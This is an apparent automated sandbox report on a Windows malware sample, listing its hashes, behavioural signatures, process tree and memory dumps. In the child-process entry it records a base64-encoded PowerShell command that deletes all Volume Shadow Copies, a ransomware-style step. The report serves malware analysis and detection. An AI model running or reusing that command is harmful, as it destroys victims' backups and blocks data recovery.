Analysis
- max time kernel: 128s
- max time network: 149s
- platform: windows10_x64
- resource: win10-en-20211208
- submitted: 24-01-2022 01:33
Static task: static1
Behavioral task: behavioral1
- Sample: 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
- Resource: win7-en-20211208
Behavioral task: behavioral2
- Sample: 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
- Resource: win10-en-20211208
General
- Target: 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
- Size: 4.5MB
- MD5: be059dd5f3442f498bde97f69265ccbd
- SHA1: 28a8eae3633023961f3bcc3d473b0aa1943676c4
- SHA256: 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7
- SHA512: 493de3059a33e9ce8bcf67dfea31af6525764917729aeb7705eec20ab78eae3d216ddc6d9d4bebcbf7fa7748e92aa4efa1f0dbcd4e67c142c8c33a317c7c421d
Malware Config
Signatures
- Enumerates connected drives (3 TTPs, 24 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes: 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
  description: File opened (read-only)
  process: 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
  ioc (24 drive root paths, in the order reported): \??\K:, \??\O:, \??\P:, \??\A:, \??\G:, \??\I:, \??\M:, \??\Q:, \??\T:, \??\V:, \??\W:, \??\B:, \??\H:, \??\Z:, \??\U:, \??\X:, \??\Y:, \??\E:, \??\N:, \??\L:, \??\R:, \??\S:, \??\F:, \??\J:
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes: 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe, powershell.exe
  pid / process:
  - 872 / 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
  - 872 / 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
  - 2600 / powershell.exe
  - 2600 / powershell.exe
  - 2600 / powershell.exe
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes: powershell.exe, vssvc.exe
  description / pid / process:
  - Token: SeDebugPrivilege / 2600 / powershell.exe
  - Token: SeBackupPrivilege / 536 / vssvc.exe
  - Token: SeRestorePrivilege / 536 / vssvc.exe
  - Token: SeAuditPrivilege / 536 / vssvc.exe
- Suspicious use of WriteProcessMemory (2 IoCs)
  Processes: 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
  description / pid / process / target process:
  - PID 872 wrote to memory of 2600 / 872 / 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe / powershell.exe
  - PID 872 wrote to memory of 2600 / 872 / 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe / powershell.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe"
  PID: 872
  - Enumerates connected drives
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  child process:
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
    PID: 2600
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\wbem\unsecapp.exe
  command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
  PID: 628
- C:\Windows\system32\vssvc.exe
  command line: C:\Windows\system32\vssvc.exe
  PID: 536
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads
- memory/2600-120-0x000001A7EEBD0000-0x000001A7EECA0000-memory.dmp (Filesize: 832KB)
- memory/2600-121-0x000001A7EEBD0000-0x000001A7EECA0000-memory.dmp (Filesize: 832KB)
- memory/2600-122-0x000001A7F2AA0000-0x000001A7F2AC2000-memory.dmp (Filesize: 136KB)
- memory/2600-127-0x000001A7F2C50000-0x000001A7F2CC6000-memory.dmp (Filesize: 472KB)